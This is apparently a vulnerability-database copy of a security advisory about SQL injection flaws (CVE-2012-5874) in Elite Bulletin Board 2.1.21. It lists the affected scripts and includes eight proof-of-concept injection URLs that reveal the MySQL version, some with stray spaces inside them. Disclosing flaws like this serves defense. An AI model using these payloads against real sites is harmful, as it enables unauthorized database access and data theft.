Lucene search
High-Tech BridgeHTB23133HistoryNov 28, 2012 - 12:00 a.m.
Multiple SQL Injection Vulnerabilities in Elite Bulletin Board
2012-11-2800:00:00
High-Tech Bridge
www.htbridge.com
17
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.003 Low
EPSS
Percentile
63.9%
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Elite Bulletin Board, which can be exploited to perform SQL injection attacks.
- Multiple SQL injection vulnerabilities in Elite Bulletin Board: CVE-2012-5874
The vulnerabilities exist due to insufficient sanitation of user-supplied data in URI in the “update_whosonline_reg()” and “update_whosonline_guest()” functions within the “/includes/user_function.php” script.
A remote attacker can send a specially crafted HTTP request to one of the following scripts and execute arbitrary SQL commands in application’s database:
- checkuser.php
- groups.php
- index.php
- login.php
- quicklogin.php
- register.php
- Search.php
- viewboard.php
- viewtopic.php
Successful exploitation of the vulnerabilities may allow attacker to extract sensitive data from the application’s database, and even get complete control over the application under certain conditions (such as insecure configuration of database and web servers).
The following PoC (Proof of Concept) codes demonstrate the vulnerabilities by displaying version of the MySQL server:
http://[host]/checkuser.php/%27,%28%28selectfrom%28select%20name_const%28ve rsion%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20–%20/
http://[host]/groups.php/% 27,%28%28selectfrom%28select%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29%29%29%20–%20/
http://[host]/index.php/%27,% 28%28selectfrom%28select%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20–%20/
http://[host]/login.php/%27,%2 8%28selectfrom%28select%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20–%20/
http://[host]/quicklogin.php/% 27,%28%28selectfrom%28select%20name_const%28version%28%29,1%29,name_c onst%28version%28%29,1%29%29a%29%29%29%20–%20/
http://[host]/register.ph p/%27,%28%28selectfrom%28select%20name_const%28version%28%29,1%29,name_con st%28version%28%29,1%29%29a%29%29%29%20–%20/
http://[host]/viewboard.php /%27,%28%28selectfrom%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20–%20/?bid=2
http://[host]/viewto pic.php/%27,%28%28selectfrom%28select%20name_const%28version%28%29,1%29,nam e_co nst%28version%28%29,1%29%29a%29%29%29%20–%20/?bid=2&tid=1
| CPE | Name | Operator | Version |
|---|---|---|---|
| elite bulletin board | le | 2.1.21 |
Related
exploitpack
exploitpack
Elite Bulletin Board 2.1.21 - Multiple SQL Injections
2012-12-21 00:00:00
dsquare
dsquare
Elite Bulletin Board 2.1.21 SQL Injection
2012-12-22 00:00:00
packetstorm
packetstorm
Elite Bulletin Board 2.1.21 SQL Injection
2012-12-20 00:00:00
securityvulns
securityvulns
Multiple SQL Injection Vulnerabilities in Elite Bulletin Board
2013-01-02 00:00:00
cve
cve
CVE-2012-5874
2013-01-12 04:33:00
openvas
openvas
Elite Bulletin Board Multiple SQL Injection Vulnerabilities
2012-12-27 00:00:00
prion
prion
Sql injection
2013-01-12 04:33:00
zdt
zdt
Elite Bulletin Board 2.1.21 SQL Injection Vulnerability
2012-12-20 00:00:00
exploitdb
exploitdb
Elite Bulletin Board 2.1.21 - Multiple SQL Injections
2012-12-21 00:00:00
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.003 Low
EPSS
Percentile
63.9%
Related for HTB23133